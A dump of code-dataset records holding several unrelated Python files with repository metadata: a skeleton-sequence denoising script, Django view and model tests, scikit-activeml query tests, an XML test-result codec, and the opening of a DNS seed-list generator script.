if ratio >= noise_spr_thres2:
del bodies_data[bodyID]
denoised_by_spr = True
noise_info += 'Filter out: %s (spread rate >= %.2f).\n' % (bodyID, noise_spr_thres2)
noise_spr_logger.info('%s\t%s\t%.6f\t%.6f' % (ske_name, bodyID, motion, ratio))
else:
joints = body_data['joints'].reshape(-1, 25, 3)[valid_frames]
body_data['motion'] = min(motion, np.sum(np.var(joints.reshape(-1, 3), axis=0)))
noise_info += '%s: motion %.6f -> %.6f\n' % (bodyID, motion, body_data['motion'])
if noise_info != '':
noise_info += '\n'
return bodies_data, noise_info, denoised_by_spr
def denoising_by_motion(ske_name, bodies_data, bodies_motion):
bodies_motion = sorted(bodies_motion.items(), key=lambda x: x[1], reverse=True)
denoised_bodies_data = [(bodies_motion[0][0], bodies_data[bodies_motion[0][0]])]
noise_info = str()
for (bodyID, motion) in bodies_motion[1:]:
if (motion < noise_mot_thres_lo) or (motion > noise_mot_thres_hi):
noise_info += 'Filter out: %s, %.6f (motion).\n' % (bodyID, motion)
noise_mot_logger.info('{}\t{}\t{:.6f}'.format(ske_name, bodyID, motion))
else:
denoised_bodies_data.append((bodyID, bodies_data[bodyID]))
if noise_info != '':
noise_info += '\n'
return denoised_bodies_data, noise_info
def denoising_bodies_data(bodies_data):
ske_name = bodies_data['name']
bodies_data = bodies_data['data']
bodies_data, noise_info_len = denoising_by_length(ske_name, bodies_data)
if len(bodies_data) == 1:
return bodies_data.items(), noise_info_len
bodies_data, noise_info_spr, denoised_by_spr = denoising_by_spread(ske_name, bodies_data)
if len(bodies_data) == 1:
return bodies_data.items(), noise_info_len + noise_info_spr
bodies_motion = dict()
for (bodyID, body_data) in bodies_data.items():
bodies_motion[bodyID] = body_data['motion']
bodies_motion = sorted(bodies_motion.items(), key=lambda x: x[1], reverse=True)
denoised_bodies_data = list()
for (bodyID, _) in bodies_motion:
denoised_bodies_data.append((bodyID, bodies_data[bodyID]))
return denoised_bodies_data, noise_info_len + noise_info_spr
def get_one_actor_points(body_data, num_frames):
joints = np.zeros((num_frames, 75), dtype=np.float32)
colors = np.ones((num_frames, 1, 25, 2), dtype=np.float32) * np.nan
start, end = body_data['interval'][0], body_data['interval'][-1]
joints[start:end + 1] = body_data['joints'].reshape(-1, 75)
colors[start:end + 1, 0] = body_data['colors']
return joints, colors
def remove_missing_frames(ske_name, joints, colors):
num_frames = joints.shape[0]
num_bodies = colors.shape[1]
if num_bodies == 2:
missing_indices_1 = np.where(joints[:, :75].sum(axis=1) == 0)[0]
missing_indices_2 = np.where(joints[:, 75:].sum(axis=1) == 0)[0]
cnt1 = len(missing_indices_1)
cnt2 = len(missing_indices_2)
start = 1 if 0 in missing_indices_1 else 0
end = 1 if num_frames - 1 in missing_indices_1 else 0
if max(cnt1, cnt2) > 0:
if cnt1 > cnt2:
info = '{}\t{:^10d}\t{:^6d}\t{:^6d}\t{:^5d}\t{:^3d}'.format(ske_name, num_frames,
cnt1, cnt2, start, end)
missing_skes_logger1.info(info)
else:
info = '{}\t{:^10d}\t{:^6d}\t{:^6d}'.format(ske_name, num_frames, cnt1, cnt2)
missing_skes_logger2.info(info)
valid_indices = np.where(joints.sum(axis=1) != 0)[0]
missing_indices = np.where(joints.sum(axis=1) == 0)[0]
num_missing = len(missing_indices)
if num_missing > 0:
joints = joints[valid_indices]
colors[missing_indices] = np.nan
global missing_count
missing_count += 1
missing_skes_logger.info('{}\t{:^10d}\t{:^11d}'.format(ske_name, num_frames, num_missing))
return joints, colors
def get_bodies_info(bodies_data):
bodies_info = '{:^17}\t{}\t{:^8}\n'.format('bodyID', 'Interval', 'Motion')
for (bodyID, body_data) in bodies_data.items():
start, end = body_data['interval'][0], body_data['interval'][-1]
bodies_info += '{}\t{:^8}\t{:f}\n'.format(bodyID, str([start, end]), body_data['motion'])
return bodies_info + '\n'
def get_two_actors_points(bodies_data):
ske_name = bodies_data['name']
label = int(ske_name[-2:])
num_frames = bodies_data['num_frames']
bodies_info = get_bodies_info(bodies_data['data'])
bodies_data, noise_info = denoising_bodies_data(bodies_data)
bodies_info += noise_info
bodies_data = list(bodies_data)
if len(bodies_data) == 1:
if label >= 50:
fail_logger_2.info(ske_name)
bodyID, body_data = bodies_data[0]
joints, colors = get_one_actor_points(body_data, num_frames)
bodies_info += 'Main actor: %s' % bodyID
else:
if label < 50:
fail_logger_1.info(ske_name)
joints = np.zeros((num_frames, 150), dtype=np.float32)
colors = np.ones((num_frames, 2, 25, 2), dtype=np.float32) * np.nan
bodyID, actor1 = bodies_data[0]
start1, end1 = actor1['interval'][0], actor1['interval'][-1]
joints[start1:end1 + 1, :75] = actor1['joints'].reshape(-1, 75)
colors[start1:end1 + 1, 0] = actor1['colors']
actor1_info = '{:^17}\t{}\t{:^8}\n'.format('Actor1', 'Interval', 'Motion') + \
'{}\t{:^8}\t{:f}\n'.format(bodyID, str([start1, end1]), actor1['motion'])
del bodies_data[0]
actor2_info = '{:^17}\t{}\t{:^8}\n'.format('Actor2', 'Interval', 'Motion')
start2, end2 = [0, 0]
while len(bodies_data) > 0:
bodyID, actor = bodies_data[0]
start, end = actor['interval'][0], actor['interval'][-1]
if min(end1, end) - max(start1, start) <= 0:
joints[start:end + 1, :75] = actor['joints'].reshape(-1, 75)
colors[start:end + 1, 0] = actor['colors']
actor1_info += '{}\t{:^8}\t{:f}\n'.format(bodyID, str([start, end]), actor['motion'])
start1 = min(start, start1)
end1 = max(end, end1)
elif min(end2, end) - max(start2, start) <= 0:
joints[start:end + 1, 75:] = actor['joints'].reshape(-1, 75)
colors[start:end + 1, 1] = actor['colors']
actor2_info += '{}\t{:^8}\t{:f}\n'.format(bodyID, str([start, end]), actor['motion'])
start2 = min(start, start2)
end2 = max(end, end2)
del bodies_data[0]
bodies_info += ('\n' + actor1_info + '\n' + actor2_info)
with open(osp.join(actors_info_dir, ske_name + '.txt'), 'w') as fw:
fw.write(bodies_info + '\n')
return joints, colors
def get_raw_denoised_data():
with open(raw_data_file, 'rb') as fr:
raw_skes_data = pickle.load(fr)
num_skes = len(raw_skes_data)
print('Found %d available skeleton sequences.' % num_skes)
raw_denoised_joints = []
raw_denoised_colors = []
frames_cnt = []
for (idx, bodies_data) in enumerate(raw_skes_data):
ske_name = bodies_data['name']
print('Processing %s' % ske_name)
num_bodies = len(bodies_data['data'])
if num_bodies == 1:
num_frames = bodies_data['num_frames']
body_data = list(bodies_data['data'].values())[0]
joints, colors = get_one_actor_points(body_data, num_frames)
else:
joints, colors = get_two_actors_points(bodies_data)
joints, colors = remove_missing_frames(ske_name, joints, colors)
num_frames = joints.shape[0]
raw_denoised_joints.append(joints)
raw_denoised_colors.append(colors)
frames_cnt.append(num_frames)
if (idx + 1) % 1000 == 0:
print('Processed: %.2f%% (%d / %d), ' % \
(100.0 * (idx + 1) / num_skes, idx + 1, num_skes) + \
'Missing count: %d' % missing_count)
raw_skes_joints_pkl = osp.join(save_path, 'raw_denoised_joints.pkl')
with open(raw_skes_joints_pkl, 'wb') as f:
pickle.dump(raw_denoised_joints, f, pickle.HIGHEST_PROTOCOL)
raw_skes_colors_pkl = osp.join(save_path, 'raw_denoised_colors.pkl')
with open(raw_skes_colors_pkl, 'wb') as f:
pickle.dump(raw_denoised_colors, f, pickle.HIGHEST_PROTOCOL)
frames_cnt = np.array(frames_cnt, dtype=np.int)
np.savetxt(osp.join(save_path, 'frames_cnt.txt'), frames_cnt, fmt='%d')
print('Saved raw denoised positions of {} frames into {}'.format(np.sum(frames_cnt),
raw_skes_joints_pkl))
print('Found %d files that have missing data' % missing_count)
if __name__ == '__main__':
get_raw_denoised_data()
| true
| true
|
1c4475fc251df59a1ea19899348e75bfc2eaad85
| 2,340
|
py
|
Python
|
pythonclubproject/club/tests.py
|
elb-dev/ITC-172
|
df7acdad309c44cfd3b7580132d28d2d7b9713c4
|
[
"Apache-2.0"
] | null | null | null |
pythonclubproject/club/tests.py
|
elb-dev/ITC-172
|
df7acdad309c44cfd3b7580132d28d2d7b9713c4
|
[
"Apache-2.0"
] | null | null | null |
pythonclubproject/club/tests.py
|
elb-dev/ITC-172
|
df7acdad309c44cfd3b7580132d28d2d7b9713c4
|
[
"Apache-2.0"
] | null | null | null |
from django.test import TestCase
from .models import Meeting, MeetingMinutes, Resource, Event
from django.urls import reverse
# Create your tests here.
class MeetingTest(TestCase):
def test_stringOutput(self):
meeting = Meeting(meetingtitle = 'Test Meeting Title')
self.assertEqual(str(meeting), meeting.meetingtitle)
def test_tablename(self):
self.assertEqual(str(Meeting._meta.db_table), 'meeting')
class ResourceTest(TestCase):
def test_stringOutput(self):
resource = Resource(resourcename = 'Tutorial Website')
self.assertEqual(str(resource), resource.resourcename)
def test_tablename(self):
self.assertEqual(str(Resource._meta.db_table), 'resource')
class EventTest(TestCase):
def test_stringOutput(self):
event = Event(eventtitle = 'Test Event Title')
self.assertEqual(str(event), event.eventtitle)
def test_tablename(self):
self.assertEqual(str(Event._meta.db_table), 'event')
class MinutesTest(TestCase):
#def test_stringOutput(self):
#minutes = MeetingMinutes(minutestime = 10)
#self.assertEqual(str(minutes), minutes.minutestime)
def test_tablename(self):
self.assertEqual(str(MeetingMinutes._meta.db_table), 'minutes')
#Testing a view
class TestIndex(TestCase):
def test_view_url_accessible_by_name(self):
response = self.client.get(reverse('index'))
self.assertEqual(response.status_code, 200)
def test_view_uses_correct_template(self):
response = self.client.get(reverse('index'))
self.assertTemplateUsed(response, 'club/index.html')
class TestGetMeetings(TestCase):
def test_view_url_accessible_by_name(self):
response = self.client.get(reverse('getmeetings'))
self.assertEqual(response.status_code, 200)
def test_view_uses_correct_template(self):
response = self.client.get(reverse('getmeetings'))
self.assertTemplateUsed(response, 'club/meetings.html')
class TestResources(TestCase):
def test_view_url_accessible_by_name(self):
response = self.client.get(reverse('resources'))
self.assertEqual(response.status_code, 200)
def test_view_uses_correct_template(self):
response = self.client.get(reverse('resources'))
self.assertTemplateUsed(response, 'club/resources.html')
| 41.052632
| 71
| 0.723077
|
from django.test import TestCase
from .models import Meeting, MeetingMinutes, Resource, Event
from django.urls import reverse
class MeetingTest(TestCase):
def test_stringOutput(self):
meeting = Meeting(meetingtitle = 'Test Meeting Title')
self.assertEqual(str(meeting), meeting.meetingtitle)
def test_tablename(self):
self.assertEqual(str(Meeting._meta.db_table), 'meeting')
class ResourceTest(TestCase):
def test_stringOutput(self):
resource = Resource(resourcename = 'Tutorial Website')
self.assertEqual(str(resource), resource.resourcename)
def test_tablename(self):
self.assertEqual(str(Resource._meta.db_table), 'resource')
class EventTest(TestCase):
def test_stringOutput(self):
event = Event(eventtitle = 'Test Event Title')
self.assertEqual(str(event), event.eventtitle)
def test_tablename(self):
self.assertEqual(str(Event._meta.db_table), 'event')
class MinutesTest(TestCase):
def test_tablename(self):
self.assertEqual(str(MeetingMinutes._meta.db_table), 'minutes')
class TestIndex(TestCase):
def test_view_url_accessible_by_name(self):
response = self.client.get(reverse('index'))
self.assertEqual(response.status_code, 200)
def test_view_uses_correct_template(self):
response = self.client.get(reverse('index'))
self.assertTemplateUsed(response, 'club/index.html')
class TestGetMeetings(TestCase):
def test_view_url_accessible_by_name(self):
response = self.client.get(reverse('getmeetings'))
self.assertEqual(response.status_code, 200)
def test_view_uses_correct_template(self):
response = self.client.get(reverse('getmeetings'))
self.assertTemplateUsed(response, 'club/meetings.html')
class TestResources(TestCase):
def test_view_url_accessible_by_name(self):
response = self.client.get(reverse('resources'))
self.assertEqual(response.status_code, 200)
def test_view_uses_correct_template(self):
response = self.client.get(reverse('resources'))
self.assertTemplateUsed(response, 'club/resources.html')
| true
| true
|
1c44766d9a91f957d9c525b9dbed78e8c36349e9
| 4,029
|
py
|
Python
|
skactiveml/pool/tests/test_discriminative_al.py
|
LukasLuehrs/scikit-activeml
|
04d7107272ef0438070808475599131d8726f547
|
[
"BSD-3-Clause"
] | null | null | null |
skactiveml/pool/tests/test_discriminative_al.py
|
LukasLuehrs/scikit-activeml
|
04d7107272ef0438070808475599131d8726f547
|
[
"BSD-3-Clause"
] | null | null | null |
skactiveml/pool/tests/test_discriminative_al.py
|
LukasLuehrs/scikit-activeml
|
04d7107272ef0438070808475599131d8726f547
|
[
"BSD-3-Clause"
] | null | null | null |
import unittest
import numpy as np
from sklearn.datasets import load_breast_cancer
from sklearn.gaussian_process import GaussianProcessClassifier
from sklearn.preprocessing import StandardScaler
from skactiveml.classifier import ParzenWindowClassifier
from skactiveml.pool import DiscriminativeAL
class TestDiscriminativeAL(unittest.TestCase):
def setUp(self):
self.random_state = 1
self.X, self.y = load_breast_cancer(return_X_y=True)
self.y_unlblb = np.full_like(self.y, -1)
self.X = StandardScaler().fit_transform(self.X)
self.discriminator = ParzenWindowClassifier(
random_state=self.random_state
)
def test_init_param_greedy_selection(self):
for greedy_selection in [0, "test", None]:
dal = DiscriminativeAL(
greedy_selection=greedy_selection, missing_label=-1
)
self.assertRaises(
TypeError,
dal.query,
X=self.X,
y=self.y_unlblb,
discriminator=self.discriminator,
)
def test_query_param_discriminator(self):
dal = DiscriminativeAL(missing_label=-1)
for discriminator in [None, GaussianProcessClassifier(), "test"]:
self.assertRaises(
TypeError,
dal.query,
X=self.X,
y=self.y_unlblb,
discriminator=discriminator,
)
def test_query(self):
for greedy_selection in [False, True]:
dal = DiscriminativeAL(
missing_label=-1,
random_state=self.random_state,
greedy_selection=greedy_selection,
)
for candidates in [None, np.arange(len(self.X))]:
if candidates is None:
n_candidates = len(self.y_unlblb)
else:
n_candidates = len(candidates)
query_indices = dal.query(
X=self.X,
y=self.y_unlblb,
discriminator=self.discriminator,
candidates=candidates,
)
self.assertEqual(1, len(query_indices))
query_indices, utilities = dal.query(
X=self.X,
y=self.y_unlblb,
discriminator=self.discriminator,
return_utilities=True,
candidates=candidates,
)
self.assertEqual(self.discriminator.classes, None)
self.assertFalse(hasattr(self.discriminator, "classes_"))
self.assertEqual(1, len(query_indices))
np.testing.assert_array_equal(
np.ones((1, n_candidates)), utilities
)
query_indices, utilities = dal.query(
X=self.X,
y=self.y_unlblb,
discriminator=self.discriminator,
candidates=candidates,
return_utilities=True,
batch_size=10,
)
self.assertEqual(10, len(query_indices))
for i in range(10):
self.assertEqual(i, np.sum(np.isnan(utilities[i])))
if greedy_selection:
default_utilities = np.ones(n_candidates)
is_nan = np.isnan(utilities[i])
np.testing.assert_array_equal(
default_utilities[~is_nan], utilities[i, ~is_nan]
)
if not greedy_selection and i < 9:
is_nan = np.isnan(utilities[i + 1])
self.assertRaises(
AssertionError,
np.testing.assert_array_equal,
utilities[i, ~is_nan],
utilities[i + 1, ~is_nan],
)
| 39.116505
| 77
| 0.518739
|
import unittest
import numpy as np
from sklearn.datasets import load_breast_cancer
from sklearn.gaussian_process import GaussianProcessClassifier
from sklearn.preprocessing import StandardScaler
from skactiveml.classifier import ParzenWindowClassifier
from skactiveml.pool import DiscriminativeAL
class TestDiscriminativeAL(unittest.TestCase):
def setUp(self):
self.random_state = 1
self.X, self.y = load_breast_cancer(return_X_y=True)
self.y_unlblb = np.full_like(self.y, -1)
self.X = StandardScaler().fit_transform(self.X)
self.discriminator = ParzenWindowClassifier(
random_state=self.random_state
)
def test_init_param_greedy_selection(self):
for greedy_selection in [0, "test", None]:
dal = DiscriminativeAL(
greedy_selection=greedy_selection, missing_label=-1
)
self.assertRaises(
TypeError,
dal.query,
X=self.X,
y=self.y_unlblb,
discriminator=self.discriminator,
)
def test_query_param_discriminator(self):
dal = DiscriminativeAL(missing_label=-1)
for discriminator in [None, GaussianProcessClassifier(), "test"]:
self.assertRaises(
TypeError,
dal.query,
X=self.X,
y=self.y_unlblb,
discriminator=discriminator,
)
def test_query(self):
for greedy_selection in [False, True]:
dal = DiscriminativeAL(
missing_label=-1,
random_state=self.random_state,
greedy_selection=greedy_selection,
)
for candidates in [None, np.arange(len(self.X))]:
if candidates is None:
n_candidates = len(self.y_unlblb)
else:
n_candidates = len(candidates)
query_indices = dal.query(
X=self.X,
y=self.y_unlblb,
discriminator=self.discriminator,
candidates=candidates,
)
self.assertEqual(1, len(query_indices))
query_indices, utilities = dal.query(
X=self.X,
y=self.y_unlblb,
discriminator=self.discriminator,
return_utilities=True,
candidates=candidates,
)
self.assertEqual(self.discriminator.classes, None)
self.assertFalse(hasattr(self.discriminator, "classes_"))
self.assertEqual(1, len(query_indices))
np.testing.assert_array_equal(
np.ones((1, n_candidates)), utilities
)
query_indices, utilities = dal.query(
X=self.X,
y=self.y_unlblb,
discriminator=self.discriminator,
candidates=candidates,
return_utilities=True,
batch_size=10,
)
self.assertEqual(10, len(query_indices))
for i in range(10):
self.assertEqual(i, np.sum(np.isnan(utilities[i])))
if greedy_selection:
default_utilities = np.ones(n_candidates)
is_nan = np.isnan(utilities[i])
np.testing.assert_array_equal(
default_utilities[~is_nan], utilities[i, ~is_nan]
)
if not greedy_selection and i < 9:
is_nan = np.isnan(utilities[i + 1])
self.assertRaises(
AssertionError,
np.testing.assert_array_equal,
utilities[i, ~is_nan],
utilities[i + 1, ~is_nan],
)
| true
| true
|
1c4476a7a8651046cc68c24e7902545fbb45d44e
| 9,207
|
py
|
Python
|
src/ea/libs/FileModels/TestResult.py
|
dmachard/extensivetesting
|
a5c3d2648aebcfaf1d0352a7aff8728ab843b73f
|
[
"MIT"
] | 9
|
2019-09-01T04:56:28.000Z
|
2021-04-08T19:45:52.000Z
|
src/ea/libs/FileModels/TestResult.py
|
dmachard/extensivetesting
|
a5c3d2648aebcfaf1d0352a7aff8728ab843b73f
|
[
"MIT"
] | 5
|
2020-10-27T15:05:12.000Z
|
2021-12-13T13:48:11.000Z
|
src/ea/libs/FileModels/TestResult.py
|
dmachard/extensivetesting
|
a5c3d2648aebcfaf1d0352a7aff8728ab843b73f
|
[
"MIT"
] | 2
|
2019-10-01T06:12:06.000Z
|
2020-04-29T13:28:20.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# -------------------------------------------------------------------
# Copyright (c) 2010-2021 Denis Machard
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# -------------------------------------------------------------------
"""
Test result module
"""
import sys
import zlib
import base64
import re
from ea.libs import Logger
from ea.libs.PyXmlDict import Dict2Xml as PyDictXml
from ea.libs.PyXmlDict import Xml2Dict as PyXmlDict
# unicode = str with python3
if sys.version_info > (3,):
unicode = str
r = re.compile(
u"[^\x09\x0A\x0D\x20-\x7E\x85\xA0-\xFF\u0100-\uD7FF\uE000-\uFDCF\uFDE0-\uFFFD]")
def removeInvalidXML(string):
def replacer(m):
return b""
return re.sub(r, replacer, string)
def bytes2str(val):
"""
bytes 2 str conversion, only for python3
"""
if isinstance(val, bytes):
return str(val, "utf8")
else:
return val
def keyequals(key, search):
"""
key is equals
"""
ret = False
if isinstance(key, bytes):
if str(key, 'utf8') == search:
ret = True
else:
if key == search:
ret = True
return ret
class DataModel(Logger.ClassLogger):
"""
Data model for test result
"""
def __init__(self, testResult='', testHeader=''):
"""
This class describes the model of the test result document,
and provides a xml <=> python encoder
The following xml :
<?xml version="1.0" encoding="utf-8" ?>
<file>
<properties">
<comments>
<comment>
<author>author</author>
<datetime>...</datetime>
<post>...</post>
</comment>
....
</comments>
</properties>
<testheader>...</testheader>
<testresult>...</testresult>
</file>
"""
self.codecX2D = PyXmlDict.Xml2Dict()
self.codecD2X = PyDictXml.Dict2Xml(coding=None)
self.properties = {'properties': {'comments': {'comment': []}}}
self.testresult = testResult
self.testheader = testHeader
def addComment(self, user_name, user_post, post_timestamp):
"""
Add one comment
"""
try:
comments = self.properties['properties']['comments']
tpl = {
'author': user_name,
'datetime': str(post_timestamp),
'post': user_post}
if isinstance(comments, dict):
if isinstance(comments['comment'], list):
comments['comment'].append(tpl)
else:
comments['comment'] = [comments['comment'], tpl]
else:
comments = {'comment': [tpl]}
except Exception as e:
self.error("[addComment] %s" % str(e))
return None
return comments
def delComments(self):
"""
Delete all comments
"""
self.properties['properties']['comments'] = {'comment': []}
def toXml(self):
"""
Python data to xml
@return:
@rtype:
"""
try:
if sys.version_info > (3,):
self.testresult = bytes(self.testresult, "utf8")
self.testheader = bytes(self.testheader, "utf8")
except Exception as e:
self.error("TestResult > To Xml prepare: %s" % str(e))
return None
xmlDataList = [b'<?xml version="1.0" encoding="utf-8" ?>']
xmlDataList.append(b'<file>')
try:
xmlDataList.append(self.codecD2X.parseDict(dico=self.properties))
except Exception as e:
self.error("TestResult > To Xml test prop: %s" % str(e))
return None
try:
tr = zlib.compress(self.testresult)
tr64 = base64.b64encode(tr)
if sys.version_info > (3,):
tr64 = tr64.decode("utf8")
xmlDataList.append(
b'<testresult><![CDATA[%s]]></testresult>' %
bytes(
tr64, "utf8"))
else:
xmlDataList.append(
b'<testresult><![CDATA[%s]]></testresult>' %
tr64)
except Exception as e:
self.error("TestResult > To Xml test result: %s" % str(e))
return None
try:
hdr = zlib.compress(self.testheader)
hdr64 = base64.b64encode(hdr)
if sys.version_info > (3,):
hdr64 = hdr64.decode("utf8")
xmlDataList.append(
b'<testheader><![CDATA[%s]]></testheader>' %
bytes(
hdr64, "utf8"))
else:
xmlDataList.append(
b'<testheader><![CDATA[%s]]></testheader>' %
hdr64)
except Exception as e:
self.error("TestResult > To Xml test header: %s" % str(e))
return None
xmlDataList.append(b'</file>')
ret = b'\n'.join(xmlDataList)
if sys.version_info > (3,):
ret = ret.decode("utf8")
try:
# remove all invalid xml data
ret = removeInvalidXML(ret)
except Exception as e:
self.error("TestResult > To Xml invalid: %s" % str(e))
return None
return ret
def load(self, absPath=None, rawData=None):
"""
Load data model from a file or from arguments
@param absPath:
@type absPath:
@param rawData:
@type rawData:
"""
self.properties = {}
self.testresult = ''
# open the file
if rawData is None:
try:
f = open(absPath, 'rb')
read_data = f.read()
f.close()
except Exception as e:
self.error(e)
return False
else:
read_data = rawData
# uncompress the file
try:
decompressed_data = zlib.decompress(read_data)
except Exception as e:
self.error("uncompress testresult error: %s" % e)
return False
# convert xml to python objects
try:
ret = self.codecX2D.parseXml(xml=decompressed_data, huge_tree=True)
del decompressed_data
del read_data
except Exception as e:
self.error("parse xml error: %s" % str(e))
return False
# decode testresult key
try:
tr_decoded = base64.b64decode(ret['file']['testresult'])
tr_decompressed = zlib.decompress(tr_decoded)
if sys.version_info > (3,): # python3 support
self.testresult = bytes2str(tr_decompressed)
else:
self.testresult = tr_decompressed
del tr_decoded
except Exception as e:
self.error("read testresult error: %s" % str(e))
return False
# decode the testheader key
try:
if 'testheader' not in ret['file']: # for backward compatibility
ret['file']['testheader'] = ''
else:
hdr_decoded = base64.b64decode(ret['file']['testheader'])
hdr_decompressed = zlib.decompress(hdr_decoded)
if sys.version_info > (3,): # python3 support
self.testheader = bytes2str(hdr_decompressed)
else:
self.testheader = hdr_decompressed
except Exception as e:
self.error("read test result header error: %s" % str(e))
return False
# finally extract properties key
try:
properties = ret['file']['properties']
self.properties = {'properties': properties}
except Exception as e:
self.error("prepare test result properties error: %s" % str(e))
return False
return True
| 31.530822
| 84
| 0.528185
|
import sys
import zlib
import base64
import re
from ea.libs import Logger
from ea.libs.PyXmlDict import Dict2Xml as PyDictXml
from ea.libs.PyXmlDict import Xml2Dict as PyXmlDict
if sys.version_info > (3,):
unicode = str
r = re.compile(
u"[^\x09\x0A\x0D\x20-\x7E\x85\xA0-\xFF\u0100-\uD7FF\uE000-\uFDCF\uFDE0-\uFFFD]")
def removeInvalidXML(string):
def replacer(m):
return b""
return re.sub(r, replacer, string)
def bytes2str(val):
if isinstance(val, bytes):
return str(val, "utf8")
else:
return val
def keyequals(key, search):
ret = False
if isinstance(key, bytes):
if str(key, 'utf8') == search:
ret = True
else:
if key == search:
ret = True
return ret
class DataModel(Logger.ClassLogger):
def __init__(self, testResult='', testHeader=''):
self.codecX2D = PyXmlDict.Xml2Dict()
self.codecD2X = PyDictXml.Dict2Xml(coding=None)
self.properties = {'properties': {'comments': {'comment': []}}}
self.testresult = testResult
self.testheader = testHeader
def addComment(self, user_name, user_post, post_timestamp):
try:
comments = self.properties['properties']['comments']
tpl = {
'author': user_name,
'datetime': str(post_timestamp),
'post': user_post}
if isinstance(comments, dict):
if isinstance(comments['comment'], list):
comments['comment'].append(tpl)
else:
comments['comment'] = [comments['comment'], tpl]
else:
comments = {'comment': [tpl]}
except Exception as e:
self.error("[addComment] %s" % str(e))
return None
return comments
def delComments(self):
self.properties['properties']['comments'] = {'comment': []}
def toXml(self):
try:
if sys.version_info > (3,):
self.testresult = bytes(self.testresult, "utf8")
self.testheader = bytes(self.testheader, "utf8")
except Exception as e:
self.error("TestResult > To Xml prepare: %s" % str(e))
return None
xmlDataList = [b'<?xml version="1.0" encoding="utf-8" ?>']
xmlDataList.append(b'<file>')
try:
xmlDataList.append(self.codecD2X.parseDict(dico=self.properties))
except Exception as e:
self.error("TestResult > To Xml test prop: %s" % str(e))
return None
try:
tr = zlib.compress(self.testresult)
tr64 = base64.b64encode(tr)
if sys.version_info > (3,):
tr64 = tr64.decode("utf8")
xmlDataList.append(
b'<testresult><![CDATA[%s]]></testresult>' %
bytes(
tr64, "utf8"))
else:
xmlDataList.append(
b'<testresult><![CDATA[%s]]></testresult>' %
tr64)
except Exception as e:
self.error("TestResult > To Xml test result: %s" % str(e))
return None
try:
hdr = zlib.compress(self.testheader)
hdr64 = base64.b64encode(hdr)
if sys.version_info > (3,):
hdr64 = hdr64.decode("utf8")
xmlDataList.append(
b'<testheader><![CDATA[%s]]></testheader>' %
bytes(
hdr64, "utf8"))
else:
xmlDataList.append(
b'<testheader><![CDATA[%s]]></testheader>' %
hdr64)
except Exception as e:
self.error("TestResult > To Xml test header: %s" % str(e))
return None
xmlDataList.append(b'</file>')
ret = b'\n'.join(xmlDataList)
if sys.version_info > (3,):
ret = ret.decode("utf8")
try:
ret = removeInvalidXML(ret)
except Exception as e:
self.error("TestResult > To Xml invalid: %s" % str(e))
return None
return ret
def load(self, absPath=None, rawData=None):
self.properties = {}
self.testresult = ''
if rawData is None:
try:
f = open(absPath, 'rb')
read_data = f.read()
f.close()
except Exception as e:
self.error(e)
return False
else:
read_data = rawData
try:
decompressed_data = zlib.decompress(read_data)
except Exception as e:
self.error("uncompress testresult error: %s" % e)
return False
try:
ret = self.codecX2D.parseXml(xml=decompressed_data, huge_tree=True)
del decompressed_data
del read_data
except Exception as e:
self.error("parse xml error: %s" % str(e))
return False
try:
tr_decoded = base64.b64decode(ret['file']['testresult'])
tr_decompressed = zlib.decompress(tr_decoded)
if sys.version_info > (3,):
self.testresult = bytes2str(tr_decompressed)
else:
self.testresult = tr_decompressed
del tr_decoded
except Exception as e:
self.error("read testresult error: %s" % str(e))
return False
try:
if 'testheader' not in ret['file']:
ret['file']['testheader'] = ''
else:
hdr_decoded = base64.b64decode(ret['file']['testheader'])
hdr_decompressed = zlib.decompress(hdr_decoded)
if sys.version_info > (3,):
self.testheader = bytes2str(hdr_decompressed)
else:
self.testheader = hdr_decompressed
except Exception as e:
self.error("read test result header error: %s" % str(e))
return False
try:
properties = ret['file']['properties']
self.properties = {'properties': properties}
except Exception as e:
self.error("prepare test result properties error: %s" % str(e))
return False
return True
| true
| true
|
1c4477483962ec1dcb79e2cdf6424d5181cb6433
| 5,514
|
py
|
Python
|
contrib/seeds/makeseeds.py
|
masternodecoin/Masternodecoin-NEW
|
2c1e745dc371268af8b21a9b1b1ef99f1e31f059
|
[
"MIT"
] | null | null | null |
contrib/seeds/makeseeds.py
|
masternodecoin/Masternodecoin-NEW
|
2c1e745dc371268af8b21a9b1b1ef99f1e31f059
|
[
"MIT"
] | null | null | null |
contrib/seeds/makeseeds.py
|
masternodecoin/Masternodecoin-NEW
|
2c1e745dc371268af8b21a9b1b1ef99f1e31f059
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2013-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Generate seeds.txt from Pieter's DNS seeder
#
NSEEDS=512
MAX_SEEDS_PER_ASN=2
MIN_BLOCKS = 615801
# These are hosts that have been observed to be behaving strangely (e.g.
# aggressively connecting to every node).
SUSPICIOUS_HOSTS = {
""
}
import re
import sys
import dns.resolver
import collections
PATTERN_IPV4 = re.compile(r"^((\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})):(\d+)$")
PATTERN_IPV6 = re.compile(r"^\[([0-9a-z:]+)\]:(\d+)$")
PATTERN_ONION = re.compile(r"^([abcdefghijklmnopqrstuvwxyz234567]{16}\.onion):(\d+)$")
PATTERN_AGENT = re.compile(r"^(/MTNCCore:2.2.(0|1|99)/)$")
def parseline(line):
sline = line.split()
if len(sline) < 11:
return None
m = PATTERN_IPV4.match(sline[0])
sortkey = None
ip = None
if m is None:
m = PATTERN_IPV6.match(sline[0])
if m is None:
